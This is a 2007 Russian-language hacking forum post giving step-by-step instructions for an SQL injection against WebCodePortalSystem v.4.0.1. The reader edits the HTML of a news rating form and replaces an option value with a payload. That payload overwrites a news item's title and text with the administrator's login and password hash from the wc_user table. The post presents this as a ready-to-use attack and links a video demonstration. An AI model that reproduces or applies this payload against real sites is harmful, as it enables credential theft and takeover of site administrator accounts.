22.12.2007, 15:21
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
WebCodePortalSystem v.4.0.1
[SQL инъекция]
Заходим в новости, открываем любую - опция "Читать", дальше видим надпись "Оценить:".
Лезем в исходник страницы (имеется виду html страницы) к примеру в Опере Вид - Исходный текст
Находим строчку:
Код:
<option value="1">1</option>
И заменяем её на:
Код:
<option value="1,title=(select user_login from wc_user where id=2),photocor=(select user_pass from wc_user where id=2),ntext=null,phototext=null,kritery=null">1</option>
Нажимаем "Применить изменения", после чего выбираем кол-во баллов равное 1, и нажимаем Оценить.
Все теперь если просматривать новости, то в место заголовка текущей новости будет логин админа, а текст новости - хеш его пароля.
Видео (качество плохое, но понять можно):
http://rapidshare.com/files/78277422/heck2.rar.html
|
|
|